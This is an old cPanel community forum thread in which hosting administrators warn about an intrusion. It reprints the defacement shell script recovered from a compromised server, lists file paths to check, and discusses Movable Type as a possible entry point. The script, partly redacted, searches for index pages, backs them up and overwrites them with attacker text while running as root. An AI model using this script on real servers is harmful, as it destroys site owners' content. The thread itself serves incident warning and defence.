Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Warning - Watch For This Site.

Discussion in 'General Discussion' started by dgbaker, Jul 11, 2003.

  1. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,574
    Likes Received:
    3
    Trophy Points:
    343
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  2. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,131
    Likes Received:
    1
    Trophy Points:
    168
    Location:
    New York
    Could you tell us what this link is without us having to be suckered into clicking it ???

    :confused:

    cPanel.net Support Ticket Number:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,574
    Likes Received:
    3
    Trophy Points:
    343
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    Sorry, you are right of course, here is that page. It is a shell script actually. This thread http://forums.cpanel.net/showthread.php?s=&threadid=12014 is the result of this script. It's the exact errors we saw on another machine.



    #!/bin/bash
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # ##
    # ##
    # Brazilians Intruders 0f Systens Team 2003 ##
    # Contato: bi0s@mail.com ##
    # irc.brasnet.org /j bi0sbr ##
    # www.bi0s.kit.net ##
    # Devastador de Server por OverKill_ ##
    # ##
    ##########################################################
    procura_paginas() {
    find /$DIR_LOG -name index.html >logs
    find /$DIR_LOG -name index.htm >>logs
    find /$DIR_LOG -name index.php >>logs
    #find $DIR_LOG -name *wtmp* >>logs
    LINHA=`wc logs |cut -c-7`
    }
    console() {
    REMOVE CODE FOR SAFETY REASONS; echo "ok"
    echo -n "==> Aguarde, procurando paginas.."
    procura_paginas;
    echo "encontrados $LINHA Paginas para Ownar"
    sleep 5
    echo -n "--> Colocando seu texto nas Paginas"
    for log in `cat logs`
    do
    echo -n " -> in $log..."

    cp $log $log.bak
    echo $MY_TEXT >$log
    echo "ok"
    done
    echo "Brazilians Intruders 0f Systens Ownz You. OverKill was Here | Contato: irc.brasnet.org /j bi0sbr"
    echo "ok"
    echo "((((( Agora é soh registra! )))))"
    }
    help() {
    echo " Use: $0 <seu_texto>"
    echo "Exemplo: $0 'BI0S Ownz'"
    }

    if [ `whoami` != "root" ]; then
    echo " Execute somente como root"
    exit
    fi

    if [ "$2" = "" ]; then
    DIR_LOG="./"
    else
    DIR_LOG=$2
    fi
    echo; echo ; echo "<<<<<<<<< BI0S Devastador de Server >>>>>>>>>>"
    echo " ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
    echo " www.bi0s.kit.net "
    echo "e-mail: bi0s@mail.com irc.brasnet.org #bi0sbr"
    echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
    if [ "$1" = "" ]; then
    help;
    else
    MY_TEXT="$1"
    console;
    fi

    cPanel.net Support Ticket Number:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #3 dgbaker, Jul 11, 2003
    Last edited: Jul 11, 2003
  4. TheRedX

    TheRedX Member

    Joined:
    Jul 9, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    151
    How is this shell executed?
    Is this something that's being uploaded to a server and run or is it a remote script seeking exploits.
    "watch for this site" is a poor warning.

    cPanel.net Support Ticket Number:
     
  5. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,574
    Likes Received:
    3
    Trophy Points:
    343
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    It was found out by going through bash_history.

    Look for /root/mass2.sh /root/devastodor.sh
    and hidden files /root/.devastador.sh.swp and /root/.devastador.sh.swo

    cPanel.net Support Ticket Number:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. semaj

    semaj Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    61
    Likes Received:
    0
    Trophy Points:
    156
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  7. Duncan

    Duncan Member

    Joined:
    Feb 19, 2003
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    151
    while looking through the source: can one prevent it by changing the execute permission for "others" on the killall command?

    cPanel.net Support Ticket Number:
     
  8. newfield

    newfield Active Member

    Joined:
    Mar 2, 2002
    Messages:
    38
    Likes Received:
    0
    Trophy Points:
    306
    Location:
    State of Confusion
    So, is there a connection between the attacks and Movable Type, or just co-incidence?

    cPanel.net Support Ticket Number:
     
  9. semaj

    semaj Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    61
    Likes Received:
    0
    Trophy Points:
    156
    After further investigating, 2 of the 3 domains haad movable type, the third did not.

    cPanel.net Support Ticket Number:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  10. infinityws

    infinityws Well-Known Member

    Joined:
    Feb 20, 2003
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    166
    What version of MT did it have?

    cPanel.net Support Ticket Number:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  11. casey

    casey Well-Known Member

    Joined:
    Jan 17, 2003
    Messages:
    2,303
    Likes Received:
    0
    Trophy Points:
    191
    Yeah, good question. If it was MT, then it needs to be banned...

    cPanel.net Support Ticket Number:
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice